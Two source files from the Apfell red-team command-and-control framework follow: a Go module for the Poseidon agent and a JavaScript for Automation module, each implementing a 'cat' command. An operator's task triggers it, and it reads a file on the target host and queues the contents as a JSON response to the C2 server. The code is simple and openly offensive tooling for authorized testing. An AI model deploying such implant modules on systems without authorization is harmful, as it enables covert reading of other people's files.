File: apfell-docker/app/payloads/poseidon/commands/cat/cat.go
package cat
 
import (
	"os"
	"pkg/utils/structs"
	"pkg/profiles"
	"encoding/json"
	"sync"
)

var mu sync.Mutex

//Run - package function to run cat
func Run(task structs.Task) {
	
	f, err := os.Open(task.Params)

	msg := structs.Response{}
	msg.TaskID = task.TaskID
	if err != nil {
		
		msg.UserOutput = err.Error()
		msg.Completed = true
		msg.Status = "error"

		resp, _ := json.Marshal(msg)
		mu.Lock()
		profiles.TaskResponses = append(profiles.TaskResponses, resp)
		mu.Unlock()
		return
	}

	info, err := f.Stat()

	if err != nil {
		
		msg.UserOutput = err.Error()
		msg.Completed = true
		msg.Status = "error"

		resp, _ := json.Marshal(msg)
		mu.Lock()
		profiles.TaskResponses = append(profiles.TaskResponses, resp)
		mu.Unlock()
		return
	}

	data := make([]byte, int(info.Size()))
	n, err := f.Read(data)
	if err != nil && n == 0 {
		
		msg.UserOutput = err.Error()
		msg.Completed = true
		msg.Status = "error"

		resp, _ := json.Marshal(msg)
		mu.Lock()
		profiles.TaskResponses = append(profiles.TaskResponses, resp)
		mu.Unlock()
		return
	}
	
	msg.UserOutput = string(data)
	msg.Completed = true
	resp, _ := json.Marshal(msg)
	mu.Lock()
	profiles.TaskResponses = append(profiles.TaskResponses, resp)
	mu.Unlock()
	return
}

File: apfell-docker/app/payloads/apfell-jxa/commands/cat/cat.js
exports.cat = function(task, command, params){
    try{
        let contents = $.NSString.stringWithContentsOfFileEncodingError($(params), $.NSUTF8StringEncoding, $());
        if(contents === undefined || contents === ""){
            return JSON.stringify({"user_output": "No output from command", "completed": true});
        }
        if(contents === true){
            return JSON.stringify({"user_output": "True", "completed": true});
        }
        if(contents === false){
            return JSON.stringify({"user_output": "False", "completed": true});
        }
        return JSON.stringify({"user_output": contents, "completed": true});
    }
    catch(error){
        return JSON.stringify({"user_output": error.toString(), "status": "error", "completed": true});
    }
};
COMMAND_ENDS_HERE